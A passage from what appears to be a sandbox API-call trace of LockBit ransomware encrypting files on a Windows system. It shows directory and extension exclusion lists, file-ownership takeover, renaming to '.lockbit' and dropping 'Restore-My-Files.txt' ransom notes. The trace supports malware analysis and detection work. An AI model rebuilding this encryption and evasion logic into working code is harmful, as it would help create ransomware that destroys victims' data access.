(lpString1=".dbs", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.635] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.635] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.635] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.635] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.636] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.636] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.636] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.636] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png.lockbit") returned 72 [0085.636] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.636] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.637] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.637] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.637] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.637] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.637] RtlFreeAnsiString (AnsiString="\\") [0085.637] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0085.637] malloc (_Size=0x200) returned 0x77d800 [0085.637] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.637] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.638] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.638] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.638] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.638] CloseHandle (hObject=0x3c0) returned 1 [0085.638] free (_Block=0x77d800) [0085.639] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.639] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.639] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.639] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3000) returned 1 [0085.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.640] ReadFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.644] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.644] malloc (_Size=0xa6) returned 0x77d800 [0085.644] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0085.645] free (_Block=0x77d800) [0085.645] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.645] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.645] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.645] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="push_title.png", cAlternateFileName="")) returned 0 [0085.645] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0085.646] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Rectangles", cAlternateFileName="RECTAN~1")) returned 1 [0085.646] lstrcmpiW (lpString1=".", lpString2="Rectangles") returned -1 [0085.646] lstrcmpiW (lpString1="..", lpString2="Rectangles") returned -1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="$windows.~bt") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="intel") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="msocache") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="$recycle.bin") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="$windows.~ws") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="tor browser") returned -1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="boot") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="system volume information") returned -1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="perflogs") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="google") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="application data") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="windows") returned -1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="windows.old") returned -1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="appdata") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="Windows nt") returned -1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="Msbuild") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="Microsoft") returned 1 [0085.646] lstrcmpiW (lpString1="Rectangles", lpString2="All users") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="mozilla") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="Microsoft.NET") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="microsoft shared") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="Internet Explorer") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="common files") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="opera") returned 1 [0085.647] lstrcmpiW (lpString1="Rectangles", lpString2="Windows Journal") returned -1 [0085.647] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 55 [0085.647] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*") returned 57 [0085.647] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0085.652] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.652] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.652] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0085.652] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.652] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f955d49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f955d49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0085.652] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0085.652] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0085.652] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0085.652] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.652] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.652] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.652] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.652] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.653] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.653] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.653] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.653] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.654] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.654] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.655] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0085.655] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0085.655] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0085.655] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0085.655] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0085.655] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0085.655] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0085.655] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.655] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png") returned=".png" [0085.655] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.655] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.655] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.655] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.656] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.656] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.657] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png.lockbit") returned 81 [0085.657] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.657] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.658] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.658] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.658] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.658] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.658] RtlFreeAnsiString (AnsiString="\\") [0085.659] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0085.659] malloc (_Size=0x200) returned 0x77d800 [0085.659] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.659] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.659] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.659] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.660] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.660] CloseHandle (hObject=0x3c4) returned 1 [0085.660] free (_Block=0x77d800) [0085.660] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0085.660] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.660] malloc (_Size=0x40068) returned 0x2031ed0 [0085.660] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=4570) returned 1 [0085.660] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.661] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0085.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0085.662] ReadFile (in: hFile=0x3c4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.664] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.664] malloc (_Size=0xb8) returned 0x77d800 [0085.664] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0085.665] free (_Block=0x77d800) [0085.665] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.665] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.665] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.665] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.666] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.666] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.667] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9c8160, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9c8160, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0085.667] lstrcmpiW (lpString1=".", lpString2="1047x576_91n92.png") returned -1 [0085.667] lstrcmpiW (lpString1="..", lpString2="1047x576_91n92.png") returned -1 [0085.668] PathFindExtensionW (pszPath="1047x576_91n92.png") returned=".png" [0085.668] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.668] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.668] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.669] lstrcmpiW 